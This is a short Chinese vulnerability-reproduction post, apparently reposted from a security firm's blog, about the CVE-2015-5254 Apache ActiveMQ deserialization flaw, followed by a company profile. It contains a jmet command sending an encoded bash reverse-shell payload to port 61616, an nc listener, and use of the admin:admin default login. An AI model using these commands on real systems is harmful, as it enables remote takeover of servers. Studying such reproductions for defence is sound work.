漏洞复现 CVE-2015-5254 ActiveMQ 反序列化漏洞

admin 2022年5月24日01:05:52评论95 views字数 947阅读3分9秒阅读模式

0x01 漏洞描述

    Apache ActiveMQ是由美国阿帕奇(Apache)软件基金会开发的开源消息中间件,支持Java消息服务、集群、Spring框架等。属于消息队列组件(消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等)。

    ApacheActive MQ5.13.0版本之前到5.x版本的安全漏洞,该程序引起的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化Java消息服务(JMS) ObjectMessage对象,利用该漏洞执行任意代码。

漏洞复现 CVE-2015-5254 ActiveMQ 反序列化漏洞


0x02 漏洞复现

漏洞版本:

  • Apache ActiveMQ 5.x ~ Apache ActiveMQ 5.13.0


1.使用jmet-0.1.0-all.jar工具将有效负载发送到目标IP的61616端口

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2x3RjxcCxxOTIuMTY4Ljk5LjIwOS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME x.x.x.x 61616

漏洞复现 CVE-2015-5254 ActiveMQ 反序列化漏洞


2. 通过admin:admin弱口令进入管理端

 Queues → eventjia → 点击Message ID下的队列消息即可

漏洞复现 CVE-2015-5254 ActiveMQ 反序列化漏洞


3. nc监听得到一个shell

nc.exe -lvvp 7777

漏洞复现 CVE-2015-5254 ActiveMQ 反序列化漏洞

(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)

0x03 公司简介

江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......

编制:sm

审核:fjh

审核:Dog



原文始发于微信公众号(融云攻防实验室):漏洞复现 CVE-2015-5254 ActiveMQ 反序列化漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月24日01:05:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 CVE-2015-5254 ActiveMQ 反序列化漏洞http://cn-sec.com/archives/1042435.html

发表评论

匿名网友 填写信息